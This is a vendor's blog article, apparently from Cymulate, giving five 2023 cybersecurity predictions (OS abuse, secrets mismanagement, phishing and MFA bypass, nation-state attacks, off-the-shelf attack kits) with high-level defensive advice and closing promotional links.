Cybersecurity’s continuous cat-and-mouse game requires defenders to constantly adjust to technological progress and develop adequate defenses before attackers’ creative ways exploit nascent security gaps.
Though it dates back to the mid-20th century, the OODA loop (Observe, Orient, Decide, Act), created by US Air Force Colonel John Boyd, is an ideal decision-making construct to guide cyber defenders. This four-step continuous process facilitates learning from conflict, adjusting goals, and enacting required modifications faster and more accurately.
The more than 1.7 million hours of simulated attacks in active environments performed by Cymulate in the last two years have gathered a wealth of field data that a cybersecurity researcher working 24/7 for 195 years could not even dream of.
This wealth of observations, extensively analyzed by the Cymulate research team, provides roots for identifying trends and orienting defensive priorities.
The five predictions below aim to provide cybersecurity professionals with data-driven orientation cues on which to base decisions and act.
1. Operating Systems will be prime targets
2022 saw a growing attackers’ understanding of operating systems exploitability opportunities. They became experts at exploiting cracks in least privilege configurations to bypass security controls through PowerShell, control panel, registry, DLL Side loading, and service spin-up techniques.
They also took advantage of legacy OS components far beyond Office Macros, such as MSHTA, the legacy Internet Explorer process still lingering on most Windows operating systems, and MSDT, Microsoft Support Diagnostic Tool to exploit systems. Beyond the Windows OS, they added Linux and macOS platforms to their exploit kits, tool kits, and attack vectors.
This coming year, attackers will exploit fundamental operating system issues, poorly configured or absent least privilege policies, and legacy components to circumvent security controls.
Scrutinizing operating systems, verifying least privilege policies segmentation, and phasing out legacy components where possible are sound starting points to remain secure in the coming year.
2. Abuse of secrets and elevated accounts management will rise
2022 was brimming with attempted and successful attacks capitalizing on the flaws in secrets and elevated accounts management. The still-prevalent habit of keeping track of critical resources, administrative accounts, crown jewels, and spreadsheets through collaboration tools is a welcome windfall for cyber-attackers. Vulnerabilities inherited from secret management third-party suppliers further weaken resilience. Attackers’ skills in exploiting insufficiently tight least privilege and secret mismanagement will continue to evolve and expand in 2023.
Focusing on implementing a true zero-trust approach should be a 2023 priority.
3. Omnichannel phishing and MFA bypassing techniques will improve
Phishing attacks in 2022 saw a massive increase in the use of non-email-based phishing techniques. From established messaging apps like WhatsApp, Facebook Messenger, or LinkedIn to more recent ones like Discord or TikTok, or professional ones like Slack or Microsoft Teams, all were abused to lure users into clicking a compromised link or downloading malware.
To gain control of users’ accounts despite MFA verification, attackers launched MFA fatigue attacks, bombarding users with authentication requests and fake, official-looking login pages. SIM-swapping attacks – transferring a mobile phone account and phone number to a new SIM card under the attacker’s control to impersonate the victim to send or receive SMS, phone calls, messages, and MFA verification codes, skyrocketed in 2022.
Integrating token and biometric factors into MFA procedures and educating employees about these new fishing techniques are two potential strategies organizations may adopt to increase resilience.
4. More Nation-State Attacks
The 2022 trend of heightened activities from nation-state-sponsored APTs is likely to worsen in 2023. Critical infrastructures are particularly at risk as successfully disrupting their activity has a nationwide impact. Beyond attempting disruptive attacks, nation-states will continue to develop and deploy hard-to-detect spying malware for espionage ad surveillance purposes. Regardless of their purposes, this increases the risk of undetectable complex unknown-unknown attacks against which detection and response solutions are powerless and will require increased vigilance from cyber-defenders.
Validating security controls’ efficacy and segmentation robustness through automated or semi-automated continuous security validation methods is the recommended prevention to limit these attacks’ escalation reach.
5. Off-the-shelf attack tools will become prevalent
The 2022 trend to misuse off-the-shelf attack kits, such as Cobalt Strike, Sliver Framework, or criminal ones like the latest comer Manjusaka will continue to rise. These kits allow attackers to expand the reach of their attacks through automated flaw-finding probes and attached exploits.
Keeping up with attackers’ progress would benefit from incorporating security validation automation tools to identify security gaps before attackers.
As last year’s predictions’ accuracy are now verifiable, time will tell how accurate these ones are. What is certain is that remaining secure in 2023 will require all hands on deck.
Webinar with Forrester – Continuous Security Testing
Learn about the benefits of Breach and Attack Simulation as opposed to traditional security testing and how it can improve your security posture.WATCH NOW
Frost & Sullivan Whitepaper on Continuous Security Validation
Get the whitepaper from Frost & Sullivan on how they anticipate the growth of the Breach and Attack Simulation market.READ MORE
Security Control Validation & Optimization Overview
Learn why investing in security controls is not a one-and-done operation. Security controls need to be validated to stay ahead of attacks.READ MORE